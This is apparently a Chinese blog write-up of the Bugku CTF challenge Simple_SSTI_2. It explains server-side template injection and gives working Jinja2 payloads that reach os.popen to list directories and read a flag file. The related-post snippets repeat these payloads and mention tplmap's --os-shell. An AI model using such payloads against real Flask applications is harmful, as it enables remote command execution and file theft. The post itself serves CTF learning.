Bugku:Simple_SSTI_2

于 2024-07-30 22:05:51 发布
阅读量429 收藏 6
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76631050/article/details/140807894
版权

目录

1.进入网站查看题目

2.开始尝试

3.判断引擎模板类型

4.构造语句,开始注入

5.得到flag

1.进入网站查看题目

再查看源代码,发现没有什么有用的。

根据题目提示SSTI,搜索一下SSTI,了解一下。

   SSTI (服务器端模板注入)也是格式化字符串的一个非常好的例子,如今的开发已经形成了非常成熟的 MVC的模式,我们的输入通过 V 接收,交给 C ,然后由 C 调用 M 或者其他的 C 进行处理,最后再返回给 V ,这样就最终显示在我们的面前了,那么这里的 V 中就大量的用到了一种叫做模板的技术,这种模板请不要认为只存在于 Python 中,感觉网上讲述的都是Python 的 SSTI ,在这之前也给了我非常大的误导(只能说自己没有好好研究,浅尝辄止),请记住,凡是使用模板的地方都可能会出现 SSTI 的问题,SSTI 不属于任何一种语言,沙盒绕过也不是,沙盒绕过只是由于模板引擎发现了很大的安全漏洞,然后模板引擎设计出来的一种防护机制,不允许使用没有定义或者声明的模块,这适用于所有的模板引擎。

2.开始尝试

先用get传入一个flag参数试试

3.判断引擎模板类型

显示为flag参数的值,可以知道页面会显示被传入flag参数的值,然后进行报错看一看网站使用的模板类型

4.构造语句,开始注入

可以看出是用的python的flask模板,开始构造语句进行注入

?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

发现目录,进入app目录,发现flag文件

?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}

5.得到flag

用cat命令查看flag,得到flag

?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

Meet.meet
关注
BugKu CTF之 Simple_SSTI_2
weixin_42557264的博客
09-16 1945
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2
记录笔记
04-22 990
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2 二级标题
[bugku]Simple_SSTI_2
ZhShy
03-10 3453
进入页面之后F12没发现什么有用的东西。 照例看看config: http://114.67.175.224:12482/?flag={{config}} 没有flag 试一试 http://114.67.175.224:12482/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 __i
BUGKU-WEB Simple_SSTI_2
最新发布
天泽岁月
02-06 614
BUGKU-WEB Simple_SSTI_2
Bugku CTF——WEB之SSTI学习笔记
qq_51096893的博客
12-19 4881
目录 知识前提 一.题目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些题目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF题目类型(我们今天讲解的是WEB类型中注入问题): 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
Bugku web Simple_SSTI_2 wp
Whaocai的博客
08-05 658
考点: ①SSTI注入 最近学了学python ssti注入,找一道题练习练习。 进去之后,提示我们有个flag参数,同时再用御剑扫一下发现没有别的页面。 结合题目,直接payload:?flag={{1+1}},用的是flask模板 jinja2引擎 常见的ssti构造payload思路是: 这道题比较简单,什么敏感关键词都没有过滤 ...
BUGKU-simple_SSTI_1漏洞注入
kingx3的博客
10-08 346
SSTI全称Server side template injection.服务端模板注入这节课主要讲flask的模板注入.flask会把类似于 的变量当做参数来渲染并填充到web页面,如果该参数可控并被后台解析则有可能被注入恶意代码导致注入漏洞请注意 模板注入只会存在于二次渲染中,无二次渲染不会出现模板注入。
BugkuWeb:Simple_SSTI_2
Light_inthe_eyes的博客
11-04 265
题目提示就很明显了是模板注入 flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} flag={{config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }} flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read
bugku simple_ssti_1
03-16
simple_ssti_1 是一道来自 Bugku 的简单 Server-Side Template Injection(SSTI)漏洞题目。 SSTI 漏洞通常发生在使用模板引擎时,攻击者可以利用这种漏洞执行任意代码。
Bugku Simple_SSTI_2
qq_52718293的博客
10-23 2617
首先打开之后是上面这样,题目有提示是ssti,所以
Bugku WEB Simple_SSTI_2
lin的博客
04-12 1570
1. 打开后,题目提示存在模板注入 2. 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 根据URL转换表,%20 -> 空格 %27 -> ', 上面的URL对应字符串为: /?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read(
XCTF shrine wp
Lakers248_的博客
05-12 285
XCTF shrine wp
十九、bugku Simple_SSTI_2
山兔的博客
09-06 449
/?flag={{ config.__class__.__init__.__globals__['os'] .popen('ls ../').read() }} ?flag={{ config.__class__.__init__.__globals__['os'] .popen('cat ../app/flag').read() }} __class__:返回对象所属类 __init__:类的初始方法,用以初始化实例.实际上魔术方法 __new__与__init__共同作为"构造函数",__new_
BugKu-web篇-Simple_SSTI_2
jiuyongpinyin的博客
05-28 887
BugKu-web篇-Simple_SSTI_2 这道题就比上一道题相对简单了,因为可以直接使用工具tplmap 下载链接: https://github.com/aStrowxyu/ssti-tools 不过需要Python2的环境 使用工具获得shell python2 tplmap.py -u "http://114.67.246.176:12782?flag=1" --os-shell flag就在目录下 ...
bugkuctfweb题解simple_ssti_2
03-16
simple_ssti_2 是一道 Bugku CTF 网络安全比赛中的 Web 题目,它是一个简单的 SSTI(Server-Side Template Injection)漏洞题目。在这个题目中,我们需要通过注入一些恶意代码来获取 flag。
【愚公系列】2023年06月 Bugku-Web(Simple_SSTI_2)
时光隧道
06-22 6106
Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。Flask提供了基本的Web开发所需的组件,如路由、请求和响应处理、会话管理、模板渲染等,同时还支持各种第三方扩展和插件,可以轻松地实现各种复杂的Web应用开发。Flask框架也因其灵活性和简易性而广受欢迎,被许多Web开发者用于构建Web应用和API。Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。
# BUGKU Simple_SSTI_1-2
zbbjya的博客
03-17 757
##BUGKU Simple_SSTI_1 查看网页源代码 提示需要传一个flag参数,Flask 是一个微型的 Python 开发的 Web 框架, 由上可知flag在secret_key下,config是flask模板中的一个全局对象而使用 /?flag={{config.items()}} 读取配置文件可得到,其数据,flag也在里面 /?flag={{config.SECRET_KEY}} 可直接得到flag Simple_SSTI_2 同样提示需要传一个flag参数 查看网
BugkuSimple_SSTI_1
qq_46230755的博客
03-01 8446
很简单的模板注入,直接F12查看提示 flag在secret_key下。 bugku才是对萌新最友好的平台!!!!
bugku——简单个人信息收集
吃肉唐僧的博客
09-02 1726
打开题目,发现只有一个zip 解压发现需要密码? ????怎么收集简单信息??? 卡了很久,上网搜索才发现有可能存在伪加密 用winhex打开,然后修改09为00 然后参考博客:https://www.cnblogs.com/0yst3r-2046/p/11351140.html 扩充一下压缩包伪加密的知识 压缩源文件数据区: 50 4B 03 04:这是头文件标记(0x040...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值